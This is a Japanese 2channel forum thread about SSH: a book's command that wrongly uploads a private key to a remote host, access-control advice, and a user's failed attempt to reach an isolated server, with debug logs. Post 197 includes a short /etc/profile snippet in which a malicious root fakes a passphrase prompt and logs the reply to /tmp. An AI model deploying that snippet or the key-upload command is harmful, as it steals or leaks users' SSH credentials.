cygwin → LinuxMint へ ssh -X で リモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。

orz

145名無しさん@お腹いっぱい。2014/11/30(日) 04:07:35.69
.xsession

146名無しさん@お腹いっぱい。2014/11/30(日) 09:01:56.33
cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'

これだと秘密鍵をremotehostに持ち出すことになるよね?
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。

147名無しさん@お腹いっぱい。2014/11/30(日) 10:48:50.82
なんで秘密キーを公開キーのファイルに追記してんの?w

148名無しさん@お腹いっぱい。2014/11/30(日) 10:54:42.92
>>146
公開鍵登録しろよ。多分id_rsa.pub

149名無しさん@お腹いっぱい。2014/12/01(月) 10:23:39.78
>>146
そんなやり方どこで聞いたんだ

150名無しさん@お腹いっぱい。2014/12/01(月) 11:04:16.75
>>147-149
川本安武とかいうバカが元凶のようだ。

http://books.google.co.jp/books?id=iUcoBQAAQBAJ&lpg=PR1&hl=ja&pg=PA35#v=onepage&q&f=false

151名無しさん@お腹いっぱい。2014/12/01(月) 12:25:54.94
「~/」を書かないんだな

152名無しさん@お腹いっぱい。2014/12/01(月) 15:20:31.53
~/はシェルに依存だから。
>>や;も意図したとおりに解釈してくれないかも知れないが。

153名無しさん@お腹いっぱい。2014/12/03(水) 23:16:27.17
~/ を解釈しないシェルって何だ?
dashもbusyboxのshも解釈するぞ

154名無しさん@お腹いっぱい。2014/12/03(水) 23:38:30.85
純正シェル。~はcsh由来だよ。

155名無しさん@お腹いっぱい。2014/12/04(木) 00:06:43.07
/bin/shがThompson ShellとかBourne ShellでOpenSSHが入ってる環境とか
無理やり作ろうとしても大変だなww

156名無しさん@お腹いっぱい。2014/12/04(木) 01:00:08.15
商用UNIX環境で古いものだとそういうのもあるな

157名無しさん@お腹いっぱい。2014/12/04(木) 01:37:00.88
うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか?

158名無しさん@お腹いっぱい。2014/12/04(木) 02:02:22.75
~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。

159名無しさん@お腹いっぱい。2014/12/04(木) 06:52:38.02
>>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。

お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?

160名無しさん@お腹いっぱい。2014/12/04(木) 07:44:13.26
>>150 = >>159 はここで作者disる暇あったらgihyoに本の回収絶版でも申請すれば?

161名無しさん@お腹いっぱい。2014/12/04(木) 08:02:25.76
正当な批判をdisってるとか。死ねば?

162名無しさん@お腹いっぱい。2014/12/04(木) 08:58:42.72
だから訂正でも謝罪でも訴訟でもなく作者の死を望んで何になるのよ

163名無しさん@お腹いっぱい。2014/12/04(木) 09:10:17.44
やっぱり川本本人か。w

164名無しさん@お腹いっぱい。2014/12/04(木) 09:51:36.60
オッスオラ川本!

165名無しさん@お腹いっぱい。2014/12/04(木) 09:54:07.71
とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった

166名無しさん@お腹いっぱい。2014/12/04(木) 09:56:28.68
新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
http://www.unixuser.org/~euske/doc/openssh/book/index.html
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない

167名無しさん@お腹いっぱい。2014/12/04(木) 09:58:54.50
「正当な批判」は作者と出版社に直接届けないと本人のためにならないぞ
http://gihyo.jp/book/2014/978-4-7741-6807-4
https://twitter.com/togakushi

168名無しさん@お腹いっぱい。2014/12/04(木) 10:55:15.15
間違った記述すると、瞬殺で特定されるとかgoogleさん怖すぎ。

169名無しさん@お腹いっぱい。2014/12/05(金) 00:16:32.57
>>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160=162=作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。

170名無しさん@お腹いっぱい。2014/12/05(金) 02:41:18.78
>>169
著者に「死ねば」と言ったのは 159

171名無しさん@お腹いっぱい。2014/12/05(金) 08:28:31.97
>>170
>>159は(川本かもしれない)>>158に「死ねば」と言った。
>>158が筆者であると断定できるのは>>158だけであるが、
お前は断定している。ゆえにお前が>>158であり川本本人。

172名無しさん@お腹いっぱい。2014/12/05(金) 08:46:18.64
で、お前はこのスレで川本死ね川本死ねと呪詛を吐くだけで
他に被害者が出ないようになんとかしようという気は全く無いわけだ
>>167にある連絡先にクレームはちゃんとつけたのか?

173名無しさん@お腹いっぱい。2014/12/05(金) 10:48:45.50
>>172
当たり前だ。タダでデバッグしてやる義理は無い。

174名無しさん@お腹いっぱい。2014/12/05(金) 15:58:44.63
読者を危険に晒した!というほどのおおげさなことなん?

chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。

scpしてchmodする直前のスキをつくというのはナシね。

物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。

175名無しさん@お腹いっぱい。2014/12/05(金) 17:09:10.53
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。

そうなの? どんな危険性が?

176名無しさん@お腹いっぱい。2014/12/05(金) 18:54:33.93
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。
別のサーバーも同じキーペアで認証してたら何が起こるか考えてみたまえ。

177名無しさん@お腹いっぱい。2014/12/05(金) 19:50:35.81
>>175
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん?

178名無しさん@お腹いっぱい。2014/12/05(金) 22:19:24.59
>>176
いや、問題ないよね? 秘密鍵のフォワードとかしてなければ

179名無しさん@お腹いっぱい。2014/12/05(金) 23:00:17.54
cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。

やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。

180名無しさん@お腹いっぱい。2014/12/05(金) 23:21:07.02
>>178
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。

181名無しさん@お腹いっぱい。2014/12/06(土) 00:00:58.57
>>179
まぁどいつもこいつもわかってて弄ってるだけなので……

182名無しさん@お腹いっぱい。2014/12/06(土) 00:01:43.20
>>180
ログイン先に秘密鍵おいておくとか頭煮えてるの? おだいじにね

183名無しさん@お腹いっぱい。2014/12/06(土) 00:09:57.17
>>182
おれじゃなくて>>178に言え。痴呆症ジジイ。

184名無しさん@お腹いっぱい。2014/12/06(土) 02:42:15.93
>>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180>>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。


公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…

185名無しさん@お腹いっぱい。2014/12/06(土) 03:02:41.76
>>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。

クライアント側で何か実行とかできるのかと思った。

186名無しさん@お腹いっぱい。2014/12/06(土) 07:22:31.63
>>184
>>>180>>183
>問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。

誤読だバカ。
>>176,>>180,>>183は全部オレだ。
「sshすること自体が危ない」ではなく「rootが信頼できないなら」への指摘だ。
言いがかりをつけるなら、どっちを引用したのか良く考えてからつけることだ。

187名無しさん@お腹いっぱい。2014/12/06(土) 16:04:33.63
誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。

一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。

188名無しさん@お腹いっぱい。2014/12/06(土) 18:12:25.55
>>187
不安を煽るというか、秘密鍵を意図せずアップロードする行為はどう考えても普通に危ないわw
正誤表が出ても初心者の類がそんなん見に行くわけがないし正誤表が出ても推奨なぞできん。

189名無しさん@お腹いっぱい。2014/12/06(土) 18:25:54.91
IPAに届けた上で、技評のトップページで謝罪訂正するレベル

190名無しさん@お腹いっぱい。2014/12/06(土) 18:32:25.86
だな
初心者がWebなんぞ見れるはずが無い

191名無しさん@お腹いっぱい。2014/12/06(土) 19:15:59.16
>>188
>>189
>>190
取ったな。

鬼の首。

192名無しさん@お腹いっぱい。2014/12/06(土) 22:51:34.25
>>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。

193名無しさん@お腹いっぱい。2014/12/06(土) 23:13:35.29
鬼? 雑魚だよ。

194名無しさん@お腹いっぱい。2014/12/06(土) 23:57:36.44
結局、ただのやっかみかよ。

195名無しさん@お腹いっぱい。2014/12/07(日) 00:04:20.63
>>194
どこをどう読んだらそんな解釈になるんですか川本さん

196名無しさん@お腹いっぱい。2014/12/07(日) 01:02:14.05
このスレに、川本さんは何人いるんだ。

197名無しさん@お腹いっぱい。2014/12/07(日) 23:50:08.35
悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね

# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi

198名無しさん@お腹いっぱい。2014/12/15(月) 12:41:54.46

199名無しさん@お腹いっぱい。2014/12/16(火) 11:02:27.42
あーあ何か変な奴に粘着されたなこのスレも…

200名無しさん@お腹いっぱい。2014/12/18(木) 09:07:32.46
>>199
おはよう、川本君。IPAには届け出たかね?

201名無しさん@お腹いっぱい。2014/12/18(木) 11:35:04.54
川本が!川本が俺を殺しに来る!!
あいつのせいで俺の鍵が流出した!!!
川本許さねえ!絶対にゆるさねえええええええええええええええええええええ!!!!!!!!!11

これぐらいキレてもいいんだよきみ

202名無しさん@お腹いっぱい。2015/04/03(金) 16:29:47.36
あけましておめでとう。
みんな、22 開けて使ってるの?
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。

203名無しさん@お腹いっぱい。2015/04/03(金) 22:17:35.30
>>202
オレもポートは変えてる。

204名無しさん@お腹いっぱい。2015/04/06(月) 09:38:02.97
fail2banしてるから22のままだなあ。
premitRootLogin noだしpassword認証も受け付けてないし。

205名無しさん@お腹いっぱい。2015/04/06(月) 13:57:05.84
22の方が便利ってわけでもないから変えてる
わざわざ余計なログ吐かせて眺める趣味もないし

206名無しさん@お腹いっぱい。2015/04/07(火) 11:27:12.23
話の流れを切って悪いが、アクセス制限について質問です。

自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、

<TCP Wrapperの場合>/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
<PAM認証の場合>/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」

どっちでも同じ効果が得られる気がするんだが、挙動に違いはある?
PAM認証を用いた方が細かく制御できるってだけ?
悪い接続元を弾くタイミングが違うとか?

207名無しさん@お腹いっぱい。2015/04/07(火) 16:29:56.81
>>206
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。

tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。

hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。

sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。

設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。

208名無しさん@お腹いっぱい。2015/04/07(火) 18:21:18.49
>>207
正に知りたい答えでした。
この前に入門書を買ったばかりでググってもイマイチ分からなかったので、素人でも分かる説明で助かります。

ありがとうございました!

209名無しさん@お腹いっぱい。2015/04/07(火) 23:46:54.67
具体的な質問 に 的確な回答
単純明快なやりとりは見てて清清しい
いい夜をありがとう

210名無しさん@お腹いっぱい。2015/04/08(水) 01:50:50.85
>>206
OpenSSH 6.7以降だとtcpwrappers/libwrapのサポートが削除されてるから注意しとけよ

211名無しさん@お腹いっぱい。2015/04/28(火) 11:48:29.85
本日 psi.ip-colo.net からお越しになったお客様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様

212名無しさん@お腹いっぱい。2015/04/28(火) 13:15:39.86
もてもてだね。

213名無しさん@お腹いっぱい。2015/05/31(日) 16:59:57.64
Tera Term r2【テラターム】 - No.823
http://peace.2ch.net/test/read.cgi/unix/1225116847/823n
823 :823:2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age!
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。

214名無しさん@お腹いっぱい。2015/05/31(日) 18:34:44.39
なんか懐かしい名前だ。
Windows からは Cygwin の ssh だからどうでもいい。

215名無しさん@お腹いっぱい。2015/05/31(日) 20:10:21.19
自分もputtyもteratermも捨ててcygwinの使ってるわ

216名無しさん@お腹いっぱい。2015/05/31(日) 22:32:37.52
Cygwinはなー……ということでMSYS2派

217名無しさん@お腹いっぱい。2015/05/31(日) 22:34:07.81
ログ取りはscriptとか使うの?

218名無しさん@お腹いっぱい。2015/06/03(水) 18:28:09.16
cygwinもMSYS2も、遠からず捨てる日が来るのかな

219名無しさん@お腹いっぱい。2015/06/03(水) 18:34:35.17
とっくにwindowsを捨ててる

220名無しさん@お腹いっぱい。2015/06/04(木) 05:26:26.98
とっくにwindowsを捨ててる(キリッ

221名無しさん@お腹いっぱい。2015/06/04(木) 20:38:59.15
質問失礼致します。

scpコマンドで
「リモートサーバー」と「そことローカル接続しているサーバー」で、
ファイルのやり取りは可能でしょうか?

具体的には、旧筐体から新筐体へデータ移行を行いたいのです
ただし旧筐体はネットワークから切り離されているという状況です

222名無しさん@お腹いっぱい。2015/06/04(木) 20:51:37.76
ローカル接続とは具体的にどのように接続しているのでしょうか?
新筐体がリモートサーバーで、旧筐体が、そこ(新筐体のことでしょうか?)とローカル接続しているサーバーですか?

新筐体と旧筐体がローカルなネットワークで接続されていて
今の場所から、旧筐体にはログインできないが、
新筐体にはログインできて、新筐体から旧筐体にはログインできるのなら
新筐体と旧筐体の間でscpなりrsyncなりなんなりと使えるでしょう。

FTPのサーバー間転送みたいなことはできませんけど。

223名無しさん@お腹いっぱい。2015/06/04(木) 21:03:36.40
>>222
まさにそういう事です!

新筐体から旧筐体へはどのようにログインすればいいんでしょうか?

http://qiita.com/maximum80/items/26034cf51f1ed5ce5988
こちらなどを見たんですが、新筐体へはログイン出来ましたが、
新筐体から旧筐体へのログイン方法が分かりません

224名無しさん@お腹いっぱい。2015/06/04(木) 21:35:54.66
旧筐体にはsshでログインできてましたか?
まず新筐体にログインします。これは出来てるんですね。
シェルが使えるとします。
scpはsshと同じログイン方法なので、パスワードで入れていたのなら

scp 旧筐体のユーザー名@旧筐体のサーバー名(IPアドレスのほうが確実かも):旧筐体内でのファイル名なりディレクトリ名 新筐体のディレクトリ名

scp root@192.168.1.20:/home/ /home
こんな感じですかね

225名無しさん@お腹いっぱい。2015/06/04(木) 21:49:55.09
>>224
大変ありがとうございます。

旧筐体にはログイン出来てないです

$ ssh redadmin@192.168.1.20
とやってみたんですが、駄目でした

226名無しさん@お腹いっぱい。2015/06/04(木) 23:20:28.21
>>225
まず、ログインできるようにしないと

227名無しさん@お腹いっぱい。2015/06/04(木) 23:47:23.18
>>226
これの事でしょうか?

簡単sshログイン方法
http://qiita.com/maximum80/items/a453ed00ac96cab77f08

新筐体と旧筐体、どちらを設定すればいいんでしょう?

228名無しさん@お腹いっぱい。2015/06/05(金) 00:18:01.59
そりゃあ勿論、旧筐体にsshでログインできるようにする。
今までどうやってログインしてましたか?

229名無しさん@お腹いっぱい。2015/06/05(金) 00:24:12.21
>>228
旧筐体にはログインした事ないです

新筐体はIPアドレス・ID・パスワードでログインしました

使用したSSHクライアントソフトは
Poderosa
Tera Term
です

230名無しさん@お腹いっぱい。2015/06/05(金) 00:33:05.47
>>229
管理者権限でログインしないと設定できません。
旧筐体の管理者はどうしていますか?
旧筐体の中をあけてハードディスクを取り出したりできますか?

231名無しさん@お腹いっぱい。2015/06/05(金) 00:38:02.48
>>230
色々本当ありがとうございます。

redadminでログイン後
rootにスイッチしました

因みにこれまでのはレンタルサーバーでの話です

旧筐体がクラックされた恐れがあるとかで、ネットワークから切り離され
新筐体へのデータ移行はサポート外なので自分でやれと言われてます

232名無しさん@お腹いっぱい。2015/06/05(金) 00:40:36.82
>>230
旧筐体の管理者はどうやったら分かりますか?

233名無しさん@お腹いっぱい。2015/06/05(金) 00:54:44.94
>>231
 redadminでログイン後
どうやってログインしたのでしょうか?
 $ ssh redadmin@192.168.1.20
 とやってみたんですが、駄目でした
もう一度やってみたら出来たのですか?

234名無しさん@お腹いっぱい。2015/06/05(金) 01:08:40.42
Poderosaで
新筐体IPアドレス・ID(redadmin)・パスワード
を設定してログイン

$ su → パスワードを訊かれてrootログイン

出来たのはここまでです。

$ssh-keygen
$ vi ~/.ssh/config
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
/etc/ssh/sshd_config
などをいじりましたが、旧筐体にはログイン出来ません

ssh redadmin@旧筐体のローカルIPアドレス
が旧筐体への接続コマンドだと案内されました

235名無しさん@お腹いっぱい。2015/06/05(金) 03:44:48.64
>>234
public keyは旧筐体に入れないとダメです。

ssh redadmin@旧筐体のローカルIPアドレス
でパスワードを聞かれませんか?

236名無しさん@お腹いっぱい。2015/06/05(金) 04:34:53.37
>>235
訊かれないです

Connection timed out になります。

237名無しさん@お腹いっぱい。2015/06/05(金) 07:09:11.54
>>236
ポートが22以外に設定されてるってことはないですか?
nmapを新筐体に入れてポートスキャンはできますか?

238名無しさん@お腹いっぱい。2015/06/05(金) 07:29:50.23
ネットワークから切り離されてるマシンにsshで入りたい、ってこと?

239名無しさん@お腹いっぱい。2015/06/05(金) 08:28:01.68
寝ている間になにかすごい事に…

240名無しさん@お腹いっぱい。2015/06/05(金) 09:39:27.83
>>231
データ移行はサポート範囲外でもログイン方法くらいはサポートしろよ、って言ってみ

241名無しさん@お腹いっぱい。2015/06/05(金) 11:34:54.14
すみません今起きました

>>237
どうやったら入れられますか?

>>238
そうです

>>240
旧筐体内のデータを移行するにはこの方法しかないと
けれどこの方法はナレッジがない為、サポート外で、
自己責任でと言われ、外部サイトを紹介されました

過去に同じような事例で同じ案内した実績があると行ってました
けれど上手く行った例は一軒も確認が取れてないそうです

>>239
メールでの問い合わせは回答が遅く
電話での問い合わせは、メールで回答すると言い、
電話受付終了直前にメールが届きます
全然進みません・・・

242名無しさん@お腹いっぱい。2015/06/05(金) 11:46:31.49
>>241
旧筐体が現在も稼動していて、
新筐体と同じローカルネットワークに存在して、
そのローカルネットワーク上での旧筐体のアドレスが192.168.1.20だっていうことは確かなの?
その情報はどこから入手したの?

243名無しさん@お腹いっぱい。2015/06/05(金) 11:48:59.59
>>242
確かだそうです(IPは途中で訂正がありましたが)
この情報はサーバー会社から頂きました

※192.168.1.20は数字を変えてあります

244名無しさん@お腹いっぱい。2015/06/05(金) 11:53:20.12
旧筐体のポートは22で間違いないそうです

245名無しさん@お腹いっぱい。2015/06/05(金) 11:53:41.91
>>243
その情報とこれをサポートから得ていて、
>ssh redadmin@旧筐体のローカルIPアドレスが旧筐体への接続コマンドだと案内されました

新筐体からssh redadmin@旧筐体のローカルIPアドレスをやった結果がこれなら
>Connection timed out になります。

繋がらんぞとサポートに言うだけだろ

246名無しさん@お腹いっぱい。2015/06/05(金) 12:00:08.12
>>245
まず最初の時点でSSHの知識がなかった為
他の手段を色々かけあいましたが、断られました

次にSSHを試してみて繋がらないので
問い合わせたところ、IPが違っていたと回答がありました

それでも繋がらないので、先程ポートを確認しましたところ
22であっているとの事でした(今再確認してもらってます)

247名無しさん@お腹いっぱい。2015/06/05(金) 12:57:23.25
新筐体にログインして
ping 旧筐体のローカルIP
をやってみて
Destination Host Unreachable
と表示されたら
ifconfig -a
ip route
ip rule
の結果を教えて
ただしifconfig -aのアドレスは置き換えて

248名無しさん@お腹いっぱい。2015/06/05(金) 12:58:53.40
結果をここに書き込むときに
IPアドレスの類は全部置き換えて

249名無しさん@お腹いっぱい。2015/06/05(金) 13:03:31.06
ローカルIPアドレスなら別にそのままでもいいんじゃね?

250名無しさん@お腹いっぱい。2015/06/05(金) 13:06:35.82
新筐体のアドレスを晒すかもしれないと思って、ねんのために

251名無しさん@お腹いっぱい。2015/06/05(金) 13:08:28.39
>>247
ありがとうございます
「Destination Host Unreachable」は表示されませんでした


PING 192.168.1.20 (192.168.1.20) 56(84) bytes of data.
64 bytes from 192.168.1.20: icmp_seq=1 ttl=64 time=0.626 ms
64 bytes from 192.168.1.20: icmp_seq=2 ttl=64 time=0.627 ms
64 bytes from 192.168.1.20: icmp_seq=3 ttl=64 time=0.633 ms
64 bytes from 192.168.1.20: icmp_seq=4 ttl=64 time=0.624 ms
64 bytes from 192.168.1.20: icmp_seq=5 ttl=64 time=0.631 ms
(中略)

--- 192.168.1.20 ping statistics ---
98 packets transmitted, 98 received, 0% packet loss, time 97059ms
rtt min/avg/max/mdev = 0.606/0.631/0.645/0.029 ms

252名無しさん@お腹いっぱい。2015/06/05(金) 15:20:39.22
もうこっちでできることはないだろう
旧筐体に触れる人じゃないと解決できない

253名無しさん@お腹いっぱい。2015/06/05(金) 15:26:15.09
クラックされてバックドアからしか入れなくされたのかもな

254名無しさん@お腹いっぱい。2015/06/05(金) 19:01:54.94
今日は、DenyHosts に引っかかる奴が一匹もいない。

255名無しさん@お腹いっぱい。2015/06/05(金) 22:41:29.34
>>252
そう思うのですが、応じてくれないのです(TT)
来週には旧筐体を回収すると言ってます・・・

256名無しさん@お腹いっぱい。2015/06/06(土) 05:46:33.41
じゃぁもう無理だな

257名無しさん@お腹いっぱい。2015/06/06(土) 06:20:38.62
レンタルサーバーのバックアップはどちらか行う契約になってたの?
自分で行う事になってたのなら、移行サポートは契約外サービス
向こうが行う契約ならば契約の履行を要求すればいい

ところで、新筐体からssh -vvv redadmin@192.168.1.20した結果見せてよ。

258名無しさん@お腹いっぱい。2015/06/06(土) 12:56:42.57
>>257
最新の規約では客側となっておりました

ssh -vvv redadmin@192.168.1.20
少々長いですが貼らして頂きます

259名無しさん@お腹いっぱい。2015/06/06(土) 12:57:56.30
OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
debug1: Reading configuration data /root/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug2: ssh_connect: needpriv 0
debug1: Connecting to 192.168.1.20 [192.168.1.20] port 22.
debug1: Connection established.
debug1: permanently_set_uid: 0/0
debug1: identity file /root/.ssh/identity type -1
debug3: Not a RSA1 key file /root/.ssh/id_rsa.
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug3: key_read: missing keytype
debug3: key_read: missing whitespace
(中略)
debug3: key_read: missing whitespace
debug2: key_type_from_name: unknown key type '-----END'
debug3: key_read: missing keytype
debug1: identity file /root/.ssh/id_rsa type 1
debug1: identity file /root/.ssh/id_dsa type -1
debug1: loaded 3 keys
debug1: Remote protocol version 1.99, remote software version OpenSSH_4.3p2
debug1: match: OpenSSH_4.3p2 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_4.3
debug2: fd 3 setting O_NONBLOCK
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr

260名無しさん@お腹いっぱい。2015/06/06(土) 12:58:59.06
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: mac_init: found hmac-md5
debug1: kex: server->client aes128-cbc hmac-md5 none
debug2: mac_init: found hmac-md5
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug2: dh_gen_key: priv key bits set: 123/256
debug2: bits set: 511/1024
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent

261名無しさん@お腹いっぱい。2015/06/06(土) 13:00:26.35
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 2
debug1: Host '192.168.1.20' is known and matches the RSA host key.
debug1: Found key in /root/.ssh/known_hosts:2
debug2: bits set: 514/1024
debug1: ssh_rsa_verify: signature correct
debug2: kex_derive_keys
debug2: set_newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug2: set_newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug2: service_accept: ssh-userauth
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug2: key: /root/.ssh/identity ((nil))
debug2: key: /root/.ssh/id_rsa (0x98eda60)
debug2: key: /root/.ssh/id_dsa ((nil))
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: start over, passed a different list publickey,password,keyboard-interactive
debug3: preferred gssapi-with-mic,publickey,keyboard-interactive,password
debug3: authmethod_lookup publickey
debug3: remaining preferred: keyboard-interactive,password
debug3: authmethod_is_enabled publickey
debug1: Next authentication method: publickey
debug1: Trying private key: /root/.ssh/identity
debug3: no such identity: /root/.ssh/identity
debug1: Offering public key: /root/.ssh/id_rsa
